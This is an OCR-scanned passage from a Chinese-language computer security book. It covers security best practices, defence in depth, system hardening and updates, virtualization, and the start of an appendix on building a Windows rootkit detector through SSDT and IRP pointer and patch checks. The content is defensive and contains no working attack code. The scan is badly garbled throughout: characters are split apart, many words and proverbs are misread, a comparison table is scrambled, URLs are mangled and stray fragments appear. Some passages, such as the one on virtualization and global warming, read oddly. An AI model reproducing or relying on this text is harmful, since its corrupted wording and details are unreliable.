取 攻 击 大 行 其 道 。 家 庭 用 户 没 有 企业 用 户 所 具备 的 高 级 解决 方案 ， 所 以 重要 的 是 对 恶意 软件 感染 保持 谨慎 。 下 面 是 家 庭 用 户 必须 


坚持 的 最 佳 实践 : 
“当心 要 求 软件 安装 的 网 页 。 
* 不 要 安装 来 自 浏 览 器 的 新 软件 ， 除 非 你 完全 理解 、 信 任 网 页 以 及 软件 提供 商 。 
- 在 安装 前 使 用 更 新 过 的 防 病毒 和 防 间 谍 软 件 扫描 每 个 通过 互联 网 下 载 的 项 目 和 程序 。 


.当心 意外 的 陌生 邮件 ， 不 管 发 送 者 是 谁 。 


* 不 要 打开 附件 或 者 单 击 电子 邮件 中 包含 的 链接 。 

.始终 启用 操作 系统 的 自动 更 新 功能 ， 并 且 尽 快 应 用 新 的 更 新 。 
“ 始终 使 用 最 新 的 防 恶意 软件 系统 ， 启 用 实时 保护 。 

+ 使 用 限制 网 站 脚本 执行 的 浏览 器 插件 和 扩展 。 


. 不 要 在 系统 上 出 现 的 每 个 弹出 窗口 上 输入 任何 用 户 名 及 密码 。 除 非 明确 地 在 网 上 银行 登录 ， 否 则 银行 不 会 询问 用 户 名 和 密 


网 络 管 理 员 的 工作 从 不 轻松 。 除 了 确保 任何 系统 完美 地 运行 之 外 ， 网 络 管理 员 还 必须 确保 网 络 得 到 加 固 ， 准 备 对 抗 任何 攻击 
活动 。 这 一 任务 非常 重要 ， 所 以 专门 的 安全 运营 中 心 (SOC) 十 分 关键 。 下 面 是 网 络 管理 员 必 须 考虑 的 最 佳 实践 : 


“ 部 署 边 界 防御 ， 包 括 Web 和 电子 邮件 网 关 ， 以 及 防火 墙 IPS。 
不 允许 不 需要 的 协议 进入 公司 网 络 。 

- 在 网 络 上 部 署 漏洞 扫描 软件 并 经 常 进行 审计 。 

- 限制 所 有 网 络 用 户 的 特权 。 

:部署 企 业 防 恶意 软件 扫描 。 

. 即使 没有 报告 网 络 漏洞 ， 也 应 该 定期 进行 威胁 建 模 

. 建立 检测 到 可 以 感染 或 者 缺陷 时 的 清晰 协议 和 提升 规程 

“ 限制 移动 设备 连接 到 企业 网 络 

“ 训练 一 个 安全 专家 团队 ， 始 终 做 好 准备 应 对 感染 或 者 攻击 。 


. 支持 最 终 用 户 安全 意识 活动 。 
黑客 预防 方法 


黑客 总 是 寻求 进入 其 他 人 的 计算 机 的 途径 。 攻 击 者 可 以 在 受害 者 不 知情 的 时 候 从 任何 地 方 进入 系统 。 不 幸 的 是 ， 永 远 都 没有 
一 劳 永 逸 的 黑客 预防 方法 。 不 管 你 投入 多 少 金钱 或 者 资源 来 设计 完美 的 网 络 ， 仍 然 会 有 人 找到 占有 它 的 途径 。 即 使 最 大 的 政府 机 
构 和 私 莒 企业 也 都 已 经 成 为 黑客 的 受害 者 。 你 能 做 的 就 是 保持 警惕 ， 并 且 采 用 纵深 防御 策略 来 确保 你 的 网 络 资产 安全 并 受到 最 好 
的 保护 。 


11.3 ”纵深 防御 


纵深 防御 (defensein depth) 是 军事 策略 的 一 个 组 成 部 分 ， 也 称 为 弹性 防御 (elastic defense) 或 者 深度 防御 (deep 
defense) 。 从 本 书 的 目的 出 友 ， 我 们 将 坚持 采用 纵深 防御 在 技术 方面 的 意义 。 纵 深 防御 的 目的 是 减 慢 攻击 者 前 进 的 步伐 而 不 是 


阻止 攻击 者 前 进 ， 为 防御 者 赢得 时 间 。 纵 深 防御 在 当今 技术 界 里 是 达到 安全 的 实用 方法 ， 包 括 了 智能 工具 、 技 术 和 程序 的 应 用 。 
纵深 防御 学 说 是 保护 能 力 、 成 本 、 操 作 和 性 能 之 间 的 一 个 平衡 。 下 面 是 纵深 防御 层次 的 图 解 。 


宁 略 、 规 程 和 意识 





使 用 多 个 如 下 层次 构成 纵深 防御 策略 : 


: 物理 安全 RRR) 


- 资产 管理 软件 

- 基于 主机 的 防火 墙 ( 软 件 ) 

" 基于 网 络 的 防火 墙 (硬件 或 者 软件 ) 
- 停火 区 (Demilitarized Zones, DMZ) 
:入侵 预防 系统 CIPS) 

. 封包 过 滤器 

- 路 由 器 和 交换 机 

. 代理 服务 器 

` 虚拟 专用 网 (VPN) 

:日 志和 审计 

- 生物 计量 学 

定时 访问 控制 


. 不 能 公开 访问 的 软件 /硬件 


11.4 ASE 


大 部 分 计算 机 提供 限制 系统 访问 的 网 络 安全 功能 。 防 病毒 程序 和 间谍 软件 拦截 程序 之 类 的 程序 阻止 恶意 软件 在 机 器 上 运行 。 
但 是 ， 即 使 采用 了 这 些 安 全 措施 ， 计 算 机 对 于 外 部 访问 仍然 是 有 漏洞 的 。 系 统 加 固 (system hardening) 又 称 为 操作 系统 加 
固 ， 用 于 最 小 化 安全 漏洞 并 且 消 除 系统 风险 。 系 统 加 固 的 目的 是 消除 尽 可 能 多 的 安全 风险 ， 一 般 通过 删除 计算 机 上 所 有 不 必要 的 
软件 程序 和 实用 程序 以 及 关闭 所 有 不 必要 的 活动 服务 来 完成 。 


系统 加 固 可 能 包括 重新 格式 化 硬盘 并 且 只 安装 计算 机 工作 的 基本 需求 。CD 驱 动 器 作为 最 后 一 个 启动 设备 ， 这 使 计算 机 在 需 
要 时 可 以 从 CD 或 者 DVD 局 动 。 如 果 不 是 必需 ， 关 闭 文 件 共享 和 打印 共享 ，TCP/IP 协 议 往往 是 唯一 安装 的 协议 。 茜 用 来 宾 ( 客 
F) 账户 ， 修 改 管理 员 账 户 名 ， 为 每 个 用 户 创建 安全 的 密码 。 启 用 审计 来 监控 未 授权 访问 企图 。 


11.5 ”上 自动 更 新 


每 种 操作 系统 和 应 用 程序 都 有 某 种 方式 的 自动 更 新 。 这 个 服务 用 于 确保 系统 修补 到 最 优 的 水 平 。 一 般 来 说 这 个 过 程 是 自动 的 
(正如 它 的 名 称 ) 并 且 在 后 台 运 行 ， 不 需要 用 户 安装 更 新 ， 除 非 他 提示 系统 提供 可 用 更 新 的 通知 。 某 些 应 用 程序 将 通知 用 户 有 新 
的 可 用 补丁 ， 并 且 提 供 现 在 安装 或 者 稍 后 安装 的 按钮 。 自 动 更 新 应 该 始终 开启 ， 并 且 始 终 允 许 连 接 到 更 新 服务 器 以 保证 系统 最 


新 。 


提示 “因为 更 新 可 能 造成 某 些 不 稳定 的 状况 ， 组 织 应 该 在 自动 更 新 应 用 到 整个 组 织 之 前 进行 初步 测试 。 


在 每 天 都 有 攻击 的 时 刻 ， 确 保 你 的 企业 在 任何 时 候 都 处 于 更 新 状态 是 很 有 意义 的 。 幸 运 的 是 ， 两 个 主要 的 OS 供 应 商 一 一 
Microsoft 和 Apple 以 及 大 部 分 Linux 分 发 商都 提供 下 载 更 新 的 方法 ，Microsoft 甚 至 自动 安装 最 关键 的 更 新 。Microsoft 提 供 
Windows 更 新 服务 已 经 多 年 ， 它 的 最 新 版 本 Microsoft Update 做 得 更 好 ， 因 为 它 还 为 许多 非 OS 应 用 程序 (包括 Microsoft 
Office) 下 载 和 安装 更 新 。Microsoft 的 自动 更 新 服务 可 能 是 该 公司 对 于 个 人 的 最 佳 安 全 补丁 工具 。 正 确 地 设置 这 个 服务 ， 可 以 
配置 系统 自动 下 载 甚至 安装 任何 关键 安全 补丁 。 


Microsoft 的 下 载 在 过 去 有 过 少数 问题 ， 但 是 最 后 ， 比 起 攻击 者 获得 你 的 网 络 的 远程 访问 权 来 说 ， 重 新 安装 这 些 偶 尔 有 问题 
的 补丁 总 还 是 要 好 一 些 。Apple 的 MacOS 提 供 软件 更 新 服务 ， 这 个 服务 在 补丁 可 用 时 启动 ， 不 能 自动 下 载 补丁 ， 但 是 至 少 会 在 
更 新 可 用 时 和 警告 你 。 


各 种 Linux 分 发 版 本 以 不 同 的 方式 (但 是 大 体 上 都 可 以 自 定义 ) 处 理 软 件 更 新 ， 和 你 的 OS 供应 商 或 者 社区 联系 获得 相关 信 
息 。 流 行 的 Ubuntu 分 发 版 本 带 有 一 个 工作 方式 很 像 Apple 的 软件 更 新 的 小 脚本 : 当 安 全 修复 和 其 他 更 新 可 用 时 ， 屏 幕 右上 角 出 
现 一 个 黄色 气球 窗口 ， 告 诉 你 哪些 更 新 和 修复 可 用 。 


11.6 虚拟 化 


在 过 去 数 年 ， 信 息 技术 (IT) 已 经 在 深度 和 广度 上 都 有 了 发 展 ， 超 过 了 第 一 代 计 算 机 专家 原来 的 概念 。 现 在 我 们 的 环境 面临 
着 全 球 性 的 威胁 ， 这 种 威胁 常 被 称 为 全 球 变 暖 。 所 有 组 织 用 于 确保 排放 量 最 小 的 最 佳 解决 方案 之 一 是 使 用 虚拟 化 技术 。 绿 色 政 
府 这 一 术语 在 过 去 一 年 已 经 成 为 流行 语 ， 它 定义 了 一 个 全 盘 方 案 会 推动 [T 行 业 朝 着 更 加 清洁 、 环 境 友 好 和 | 高效 的 方向 来 运营 业 
务 。 虚 拟 化 是 一 个 虚拟 机 (VM) 映像 的 软件 实例 ， 虚 拟 机 映像 在 称 为 虚拟 机 管理 程序 (VMM) 的 管理 应 用 中 运行 。 


使 用 虚拟 化 环境 的 重要 性 是 ， 能 够 比 非 虚拟 环境 更 好 地 管理 系统 。 例 如 ， 一 个 具有 大 量 资源 (CPU、RAM、 硬 盘 ) 的 4U 机 
架 式 服务 器 能 够 容纳 包含 一 个 域名 控制 器 、 邮 件 、 防 病毒 、 网 络 IDS 甚 至 数据 库 (以 及 /或 者 CRM 系 统 ) 的 服务 器 场 。 考 虑 一 
下 ， 从 一 台 强 有 力 的 机 器 上 运行 所 有 这 些 系统 来 代替 多 台 花 费 空调 和 电费 的 机 器 的 长 期 利益 。 虚 拟 化 很 容易 管理 并 且 更 低廉 ， 在 
一 个 每 种 费用 都 在 猛 涨 (我们 不 知道 这 种 涨 势 何 时 能 停止 ) 的 时 代 是 很 关键 的 。 


在 你 的 本 地 文件 浏览 器 中 ， 每 个 单独 的 服务 器 仅仅 是 一 个 映像 而 不 是 实际 的 服务 器 。 但 是 ， 一 旦 在 一 个 VM M 应 用 程序 中 局 
动 ， 这 些 服务 器 就 会 运行 ， 让 人 感觉 像 真 正 的 服务 器 场 。 这 种 实现 的 好 处 是 能 够 跨越 整个 企业 。 使 用 虚拟 化 的 环境 ， 你 能 简单 地 
用 一 个 系统 管理 服务 器 、 工 作 站 和 各 种 企业 级 应 用 程序 。 灾 难 恢复 、 操 作 、 维 护 和 安全 过 程 所 花费 的 时 间 都 得 以 减少 。 虚 拟 化 既 
有 商业 化 的 也 有 开源 的 平台 ， 所 以 根据 你 的 预算 和 IT 人 员 的 技能 ， 可 以 计划 和 执行 VM 解 决 方案 的 无 颖 实现 。 


我 们 有 幸 为 私人 企业 和 联邦 政府 部 门 实施 了 商业 化 和 开源 的 VM 解 决 方案 。 我 们 已 经 看 到 了 虚拟 服务 器 场 、 虚 拟 网 络 甚至 与 
恶意 软件 斗争 的 虚拟 化 的 成 功 实施 。 这 些 工作 机 会 使 我 们 相信 和 更 有 效 的 绿色 政府 虚拟 化 解决 方案 在 现在 和 将 来 能 够 承担 更 重要 的 
角色 。 


11.7 ”固有 的 安全 (从 一 开始 ) 


固有 的 (baked-in) : 形容 词 ， 意 指 内 建 (进程 、 系 统 、 交 易 、 金 融 交 换 等 ) 。 


我 们 都 知道 “固有 ”这 个 词 的 含义 。 那 么 有 人 真正 实践 过 固有 的 安全 吗 ”幸亏 答案 是 肯定 的 。 


所 以 请 记 住 ， 最 安全 的 做 法 是 从 一 开始 就 建立 固有 的 安全 。 但 是 ， 在 需要 时 可 以 完成 安全 分 层 ， 即 使 这 不 是 原始 设计 的 一 部 
分 。 基 本 的 规则 是 : 始终 扩展 和 加 强 你 的 纵深 防御 层次 。 


11.8 小 结 


你 可 以 做 很 多 确保 网 络 尽 可 能 安全 的 工作 。 但 是 ， 攻 击 者 到 处 都 是 ， 而 且 有 些 人 的 技术 领先 于 你 和 你 的 团队 。 所 以 要 始终 保 
72h, SERN, 有 些 对 手 已 经 瞄准 了 你 并 且 取 得 了 成 功 ， 而 你 甚至 还 不 知情 。 在 这 些 方 面 进行 更 多 的 研究 ， 收 集 更 多 的 
信息 ， 你 将 会 发 现 有 许多 好 的 信息 。 对 任何 团队 来 说 ， 遵 循 行业 的 最 佳 实践 都 是 很 好 的 出 发 点 。 最 后 ， 要 知道 你 的 公司 财产 的 价 
值 所 在 以 及 攻击 者 用 于 渗透 到 你 的 网 络 中 的 可 能 途径 。 孙 子 说 得 好 : “知己 知 彼 ， 百 战 不 至 。 " 


RA ”系统 安全 分 析 : 建立 你 自己 的 Rootkit 检 测 程序 


在 这 个 附录 中 ， 我 们 将 更 详细 地 介绍 如 何 将 第 10 章 中 讨论 的 一 些 主要 防 Rootkit 技 术 转 换 为 系统 完整 性 验证 工具 。 系 统 完整 
性 的 概念 已 经 出 现 了 一 段 时 间 ， 但 是 有 上段 时 间 这 一 话题 无 人 问津 。 我 们 希望 告诉 读者 完整 性 分 析 的 重要 性 并 且 恢 复 这 方面 的 讨 


论 。 


为 了 教育 的 目的 ， 本 附录 将 从 一 些 检测 基本 的 Rootkit 技 术 的 代码 开始 。 正 如 第 10 章 中 所 详细 介绍 的 ， 能 进行 Rootkti 检 测 和 
删除 的 免费 工具 很 多 ， 其 深度 和 功能 以 及 操作 系统 支持 各 有 不 同 。 你 需要 对 这 些 工具 是 否 符合 需求 以 及 是 否 需要 定制 的 解决 方案 
做 出 一 个 客观 的 评价 。 


我 们 将 要 为 你 展示 的 代码 检查 Windows 操 作 系 统 中 一 些 关键 区 域 ， 这 些 区 域 表 现 系 统 曾 被 侵害 。 我 们 将 这 些 感染 点 称 为 完 
整 性 侵害 指标 (Integrity Violation Indicator) ， 或 者 |[VI。 我 们 将 发 现 4 个 这 样 的 IVIs， 本 书 中 还 讨论 了 许多 其 他 的 指标 ， 例 
如 : 


. SSDT44-F 
- IRP44-F 
- IAT F 
- DKOM 
为 了 检测 这 些 区 域 中 的 系统 完整 性 侵害 ， 我 们 将 说 明 3 种 检测 技术 ， 这 些 技术 也 可 以 扩展 到 本 书 提 及 的 其 他 IVI1: 
- 指针 验证 (SSDT、IRP 和 IAT) 
. 函数 detour/ 修 补 检测 (SSDT、IRP 和 IAT) 
- DKOM 检 测 (DKOM) 


使 用 这 3 种 技术 分 析 系 统 中 的 |VI 是 对 操作 系统 完整 性 进行 基准 测试 的 一 个 简单 方法 。 对 于 每 个 分 析 区 域 或 者 |IV1， 我 们 将 关 


注 系统 完整 性 的 重要 性 和 使 用 代码 样本 检测 指标 存在 的 方法 。 这 种 基本 方法 可 以 作为 构建 和 定制 你 自己 的 Rootkit 检 测 程序 的 出 


我 们 在 第 3 章 和 第 4 章 中 讨论 用 户 模式 和 内 核 模 式 Rootkit， 以 及 第 10 章 中 介绍 防 Rootkit 技 术 时 接触 过 这 一 主题 。 在 本 附录 
中 ， 我 们 希望 将 这 个 主题 扩展 为 一 种 强大 的 可 扩展 并 且 用 户 友好 的 系统 完整 性 分 析 方 法 。 


在 我 们 的 警告 之 后 ， 将 以 对 系统 完整 性 分 析 的 简介 和 这 一 领域 中 进行 的 相似 工作 的 历史 来 为 本 附录 提供 一 些 背 景 。 然 后 我 们 
将 进入 IVI 和 检测 它们 的 源 代码 。 


n 


A 


在 开始 之 前 ， 提 出 一 些 警告 是 合理 的 。 本 附录 中 展示 的 代码 使 用 实时 分 析 技 术 检查 关键 的 操作 系统 部 件 。 本 书 中 已 经 讨论 
过 ， 这 些 部 件 的 实时 分 析 存 在 许多 问题 ， 例 如 恶意 程序 的 存在 可 能 干扰 分 析 。Rootkit 检 测 程序 和 Rootkit 本 身 在 实时 分 析 期 间 常 党 
互相 干扰 并 且 可 能 使 系统 前 溃 。 因 为 这 样 的 工具 影响 系统 稳定 性 ， 我 们 建议 不 要 在 生产 环境 或 者 关键 系统 上 使 用 这 类 的 代码 。 


每 个 IVI 中 讨论 的 代码 将 以 Windows 内 核 驱 动 程序 的 形式 实现 。 从 本 附录 的 目的 出 发 ， 我 们 将 不 过 多 介绍 开发 Windows 驱 动 程 
序 的 难点 。 我 们 强烈 建议 读者 在 开发 驱动 程序 之 前 查阅 Windows 驱 动 程 序 开 发 包 文档 。 


本 附录 提供 的 代码 是 按 原 样 提供 的 ， 不 保证 或 者 上 暗示 能 够 在 实际 使 用 中 稳定 工作 。 在 某 些 情况 下 ， 我 们 必须 删除 有 价值 的 查 
错 代码 使 附录 保持 合理 的 长 度 。 偶 尔 会 使 用 未 写 入 文档 的 函数 ， 以 及 一 些 不 安全 的 内 存 和 字符 事 函 数 。 风 险 自 担 ! 


注意 : 本 章 中 的 源 代码 和 网 站 上 对 应 的 代码 在 GNU Public License vetsion3 (GPLv3) 下 发 行 ， 这 一 许可 的 一 个 副本 可 


从 http://www.gnu.oteVlicenses/gpl-3.0.html 上 获得 。 


Al 什么 是 系统 完整 性 分 析 


完整 性 (integrity) 一 词 在 计算 机 安全 领域 中 有 很 多 含义 ， 它 的 定义 很 大 程度 上 取决 于 你 所 询问 的 人 以 及 背景 。 完 整 性 的 概 
念 最 经 常 与 数据 完整 性 相关 ， 如 使 用 MD5 文 件 hash 验 证 文件 内 容 在 传输 中 没有 变化 。 例 如 ， 取 证 调查 人 员 总 是 通过 比较 相关 的 
MD5hash 来 验证 驱动 器 映像 与 原始 映像 。 验 证 数据 或 者 文件 完整 性 的 主要 目标 是 确保 其 正确 性 和 所 有 使 用 模式 (传输 、 处 理 和 
存储 ) 下 的 一 致 性 。 


系统 完整 性 分 析 的 目标 也 相同 ， 但 是 范围 更 广 。 它 的 目标 不 是 验证 一 个 文件 的 状态 ， 而 是 验证 整个 计算 机 系统 的 状态 。 全 部 
系统 的 完整 性 分 析 涉 及 许多 主题 ， 包 括 物 理 访 问 、 信 息 保护 、 访 问 控制 、 验 证 、 授 权 其 至 硬件 兼容 性 问题 。 所 有 这 些 领 域 都 表现 
出 了 确保 系统 稳定 和 可 用 的 难度 。 


操作 系统 完整 性 分 析 (本 附录 所 关注 的 ) 是 系统 完整 性 分 析 的 一 个 子 集 ， 关 注 点 在 于 验证 操作 系统 及 其 组 件 的 正确 性 和 一 致 
性 。 记 住 ， 所 有 更 广泛 的 系统 完整 性 分 析 考 虑 仍然 影响 着 操作 系统 完整 性 。 例 如 ， 如 果 硬 件 击 键 记录 程序 实际 上 是 嵌入 安装 的 ， 
就 能 够 在 击 键 发 送 到 操作 系统 之 前 在 固件 级 捕捉 它们 。 操 作 系 统 的 分 析 可 能 表现 高 级 别 的 信任 ,但 是 计算 机 系统 本 身 仍然 在 较 低 
的 级 别 上 受到 侵害 。 


为 了 给 完整 性 这 个 词语 一 个 不 同 的 解释 ， 我 们 假设 特定 计算 机 系统 的 完整 性 是 你 对 其 信任 程度 的 同义词 。 这 种 信任 的 重要 性 
在 你 考虑 每 天 的 计算 机 化 生活 中 的 每 个 领域 时 有 了 新 的 意义 : 你 信任 汽车 中 的 计算 机 系统 能 够 在 寒冷 的 日 子 里 启动 引擎 ， 医 院 里 
的 医疗 设备 能 够 正确 地 计算 伤 者 的 吗啡 注射 包 的 滴 注 速 度 ， 飞 机 的 导航 系统 能 够 保证 你 安全 着 陆 ， 电 子 投票 系统 能 够 正确 计算 总 
统 选 举 的 结果 。 现 在 ， 如 果 你 知道 很 有 可 能 一 个 Rootkit 已 经 安装 在 这 些 系统 上 ， 而 这 些 设备 在 有 很 多 免费 的 检测 技术 存在 的 情 
况 下 对 这 些 Rootkit 不 作 任 何 检测 或 者 阻止 ， 那么 你 对 这 些 系 统 的 信任 程度 会 如 何 ? 你 仍然 会 登 机 吗 ? 如 果 你 的 答案 是 “不 ”， 
那么 你 怎么 能 接受 声称 保护 你 的 个 人 信息 以 及 你 的 孩子 的 互联 网 访问 的 安全 软件 有 同样 的 琉 忽 呢 ? 如 果 你 的 回答 是 “是 ”， 那 么 


可 能 只 有 直接 影响 你 的 非常 严重 的 数字 灾难 才能 够 让 你 明白 一 一 也 许 这 个 附录 也 能 做 这 项 工作 ! 


本 质 而 言 ， 恶 意 软件 和 Rootkit 会 危害 操作 系统 完整 性 从 而 危害 整个 系统 。 系 统 可 能 再 也 得 不 到 信任 ， 任 何 从 操作 系统 中 读 
取 的 信息 必须 看 作 是 不 可 靠 的 。 这 就 是 使 用 与 操作 系统 运行 于 同一 级 别 的 系统 完整 性 验证 工具 的 重要 性 。 这 样 的 工具 (如 本 章 中 
介绍 的 一 个 工具 ) 能 够 对 操作 系统 最 关键 的 组 件 (我 们 定义 为 完整 性 侵害 指标 ) 进行 客观 的 健康 检查 。 在 一 个 重复 性 的 和 可 再 现 
的 过 程 中 使 用 这 样 的 评估 ， 经 常 性 地 重新 评估 系统 的 完整 性 ， 特 别 是 对 暴露 给 公众 的 系统 ， 同 样 是 很 重要 的 。 


为 了 体会 系统 完整 性 分 析 的 重要 性 ， 考 虑 如 下 情况 : 据 我 们 所 知 ， 现 在 的 市 场 上 没有 一 种 数字 取证 产品 在 收集 数字 证 据 之 前 
试图 验证 系统 完整 性 。 这 意味 着 人 们 正在 因为 可 能 受到 污染 的 证 据 而 受到 指控 一 一 这 些 证 据 没 有 用 最 挑剔 的 方式 进行 收集 。 当 
然 ， 完 整 性 验证 工具 也 可 能 受骗 ， 但 是 天 键 是 这 些 主要 的 商业 化 产品 至 少 应 该 进行 一 些 基本 的 检查 。 这 一 问题 并 不 只 人 存在 于 取证 
产品 : 防 病毒 、HIPS/HIDS、 个 人 防火 墙 以 及 许多 其 他 工具 都 没有 在 安装 之 前 试图 验证 操作 系统 的 状态 。 


这 不 是 一 个 新 的 关注 点 ; 这 个 问题 多 年 前 就 已 经 指出 ， 但 是 不 知 为 什么 没有 音讯 ， 这 个 问题 已 经 被 遗忘 。 我 们 希望 在 本 附录 


中 再 次 提出 这 个 问题 。 
系统 完整 性 分 析 简 史 


尽管 这 个 领域 已 经 完成 了 许多 工作 ， 但 是 定义 完整 性 分 析 模 型 的 唯一 一 次 正式 的 尝试 是 JoannaRutkowska 和 安全 与 开放 方法 
学 院 (ISECOM) 于 2006 年 进行 的 。 在 他 们 的 《入 侵 检 测 的 开放 式 方法 》 (OMCD) 文档 
(http://www.isecom.org/projects/omcd.shtml) 中 ， 作 者 列举 了 确定 OS 是 否 已 经 受到 侵害 所 应 该 验证 的 各 种 操作 系统 区 域 和 组 


件 。 但是， 该 文档 仅 有 6 页 ， 仅 仅 包括 了 这 种 方法 学 的 概要 。 之 后 似乎 没有 其 他 的 内 容 得 以 公布 ! 


其 他 著名 的 Rootkit 作 者 和 研究 人 员 ， 像 Jamie Butler, Peter Silberman, Sherri Sparks 以 及 Greg Hoglund 已 经 在 主机 完整 性 领域 发 
布 了 大 量 的 作品 ， 最 著名 的 是 VICE 和 RAIDE (由 Butler/Silberman 开 发 ) ; 但 是 ， 这 些 项 目 /工具 仅仅 部 分 实现 ， 并 且 已 经 被 放 


Fo 
A.2 ”完整 性 分 析 中 的 两 个 “P” 


几乎 所 有 本 附录 以 及 大 部 分 的 系统 完整 性 分 析 中 的 检测 方法 都 需要 应 用 两 个 基本 法 则 ， 这 两 个 法 则 与 本 附录 开头 列 出 的 3 种 
金 测 技术 中 的 两 种 对 应 : 


- 指针 验证 (point Validation) ”Windows 操 作 系统 大 部 分 用 C 语 言 编写 ， 为 了 速度 大 量 使 用 了 指针 。 结 果 是 ， 许 多 我 们 进行 
完整 性 分 析 所 需 的 数据 结构 是 基于 指针 的 (列表 、 表 格 和 字符 串 ) 。 典 型 的 操作 是 遍历 函数 指针 的 一 个 表格 (例如 ， 在 检测 
SSDT 和 IRP 钩 子 时 ) 并 且 确 保 这 些 指 针 指 向 “可 信任 ”系统 模块 中 的 一 个 位 置 。 


- 修补 检测 (patch detection) “有 时 候 指针 验证 可 能 因为 代码 修补 而 失败 。 例 子 包括 detourf 和 谈 入 函数 钩子 。 在 前 者 的 情况 
下 ， 函 数 序言 被 覆盖 ; 在 后 者 的 情况 下 ， 函 数 主体 的 一 部 分 被 覆盖 。 通 过 动态 地 反 汇 编 函 数 中 的 代码 块 ， 检 测 工具 有 时 能 够 很 容 
易 地 识别 出 修补 。 在 大 部 分 情况 下 ， 当 函数 中 发 现 一 个 修补 ， 就 揭露 了 使 用 一 个 跳 转 指令 将 执行 转 到 内 存 中 的 另 一 个 恶意 模块 的 
行为 ， 这 涉及 指针 操作 。 这 时 ， 适 用 规则 1 中 的 指针 原则 。 


通常 ， 一 个 给 定 的 数据 结构 的 正常 完整 性 验证 需要 应 用 两 个 P， 即 指针 (pointer) 和 修补 (patch) 。SSDT 是 一 个 例子 。 
现在 的 大 部 分 检测 工具 只 是 遍历 指针 表 并 且 确 定 这 些 指针 指向 Windows 内 核 中 的 一 个 位 置 。 这 些 工具 遗漏 了 下 一 步 一 一 第 二 个 
P， 修 补 检 测 。 每 个 代表 系统 服务 功能 的 SSDT 项 目 都 可 能 被 修补 。 因 此 ， 在 验证 指针 之 后 ， 该 工具 还 应 该 检查 每 个 阔 数 的 修补 
情况 。 





表 A-1 摘 要 介绍 了 本 附录 中 的 完整 性 分 析 的 两 个 P 背 景 下 出 现 的 检测 技术 。 
表 A-1 两 个 P 到 Rootkit 技 术 的 映射 
Rootkit 技术 | Windows 数据 结构 挂钩 指针 检测 修补 代码 检测 适用 性 


对 于 每 个 表格 项 目 ， 反 汇 
遍历 指针 表格 ， 确 保 每 个 R A a 
RARR, MERET | 编 对 应 系统 服务 函数 的 头 几 


SSDT 钩子 函数 指针 落 在 Windows 内 核 内 核 模式 
范围 内 


条 指令 ， 确 保 执行 转移 落 在 
内 核 范围 中 
遍历 IRP 函数 处 理 程序 表 , | ”对 于 每 个 表格 项 目 ， 反 汇 
m sa | 检查 每 个 内 核 中 装 人 的 驱动 | 编 对 应 的 IRP 处 理 函 数 的 头 
RP 函数 处 理 表 ”| 程序， 确保 每 个 地 址 落 在 驱 | 几 条 指令 ， 确 保 执行 转移 落 | RRR 
动 程序 模块 范围 之 内 人 驱动 程序 模块 范围 中 
遍历 内 存 中 每 个 模块 的 输 | ”对 于 每 个 表格 项 目 ， 反 汇 
函数 输入 的 装 入 | 入 函数 表 ， 并 且 确 保 每 个 输 | 编 对 应 函数 的 头 几 条 指令 , | ”内核 模式 和 
模块 表格 入 函数 地 址 落 入 所 提供 的 模 | 确保 任何 执行 转移 落 入 模块 | 用 户 模式 
块 (DLL) 范围 内 范围 中 








下 面 ， 我 们 将 通过 介绍 SSDT 的 一 个 例子 解释 这 两 个 P 一 一 指针 验证 和 修补 验证 。 我 们 还 将 提供 装 入 的 驱动 程序 中 的 IRP 钩 子 
仿 测 的 一 个 实例 ， 阐 述 如 何 组 合 这 两 种 技术 ， 并 且 简 单 地 介绍 相同 的 技术 在 IAT 钩 子 检测 中 的 应 用 。 最 后 ， 我 们 将 阐述 检测 
DKOM 的 一 种 技术 。 


A.2.1 ”指针 验证 : 检测 SSDT 钩 子 


系统 服务 调度 表 (SSDT) 是 Windows 内 核 ntoskrnl.exe (对 于 启用 物理 地 址 扩展 的 系统 是 ntkrnlpa.exe) 输出 的 一 个 数据 
结构 。 在 第 4 章 中 已 经 讨论 过 ，Windows 利 用 这 个 结构 允许 用 户 模式 应 用 程序 访问 系统 资源 和 功能 。 例 如 ， 当 用 户 模式 程序 需要 
打开 一 个 文件 时 ， 它 调用 来 自 各 种 Windows 支 持 的 程序 库 (kernel32.dll、advapi32.dll 等 ) 的 win32API 函 数 ， 依 次 调用 
ntdll.dll 输 出 的 系统 函数 (最 终 到 达 内 核 中 的 一 个 实际 函数 ) 。 每 当 需 要 系统 服务 时 就 执行 内 核 函 数 KiSystemsService () ， 这 
个 函数 在 SSDT 中 查找 请 求 的 系统 服务 函数 然后 调用 该 函数 。 


这 个 映射 定义 于 SSDT 结 构 中 ， 这 实际 上 是 实现 系统 调用 接口 的 多 个 表格 的 统称 。 第 一 个 这 种 表格 是 获得 SSDT 副 本 的 出 发 
点 ， 内 核 输出 的 名 称 为 KeserviceDescriptorTable。 这 个 结构 有 4 个 字段 ， 包 含 指向 4 个 系统 服务 表格 的 指针 ， 在 内 部 以 名 为 
KiServiceTable 的 未 输出 结构 被 引用 。 一 般 来 说 ，KeServiceDescriptorTable 中 的 第 一 个 项 目 间接 包含 了 指向 ntoskrnl.exe 的 服 
务 表 的 一 个 指针 。 第 二 个 项 目 指向 win32k.sys (GUI 子 系统 ) 的 SSDT。 第 三 个 和 第 四 个 项 目 未 使 用 。 图 A-1 说 明了 这 些 结构 之 间 
的 关系 。 


图 A-1 列 出 了 如 何 得 到 Windows 内 核 使 用 的 “真正 ”SSDT 结 构 的 3 个 步骤 。 第 三 步 中 展示 的 结构 KiServiceTable 是 SSDT 钩 
子 主题 中 大 部 分 资料 所 提 到 的 结构 。 


注意 : 系统 维护 SSDT 的 第 二 个 副本 。 这 个 第 二 副本 被 称 作 KeServiceDescriptorTableShadow。 关 于 这 个 结构 的 更 多 信息 ， 参 考 





Alexandar Volynkin 的 网 站 http://www.volynkin.com/sdts.htm. 
检测 SSDT 钩 子 的 最 简单 方法 包括 如 下 3 步 : 


. 获得 当前 “真实 ”的 全 局 SSDT 表 。 


. 查找 内 存 中 内 核 的 基地 址 及 其 模块 大 小 。 


. 检查 表格 中 的 每 个 项 目 并 且 确定 服 


数 的 地 址 是 否 指 向 内 核 的 地 址 空间 ; 如 果 地 址 落 在 内 核 范围 内 ， 该 项 目 就 很 可 
合法 的 。 如 果 项 目 落 在 内 核 之 外 ， 那 么 该 


EE 能 是 
函数 被 挂钩 。 


唉 ， 这 个 过 程 恰 恰 没 有 看 上 去 那么 容易 。 


注意 : 这 里 ， 我 们 打算 检查 全 局 服务 表 。Windows 中 的 每 个 线程 获得 这 个 全 局 表 的 一 个 局 部 副本 ， 这 也 能 够 单独 挂钩 ， 本 附 
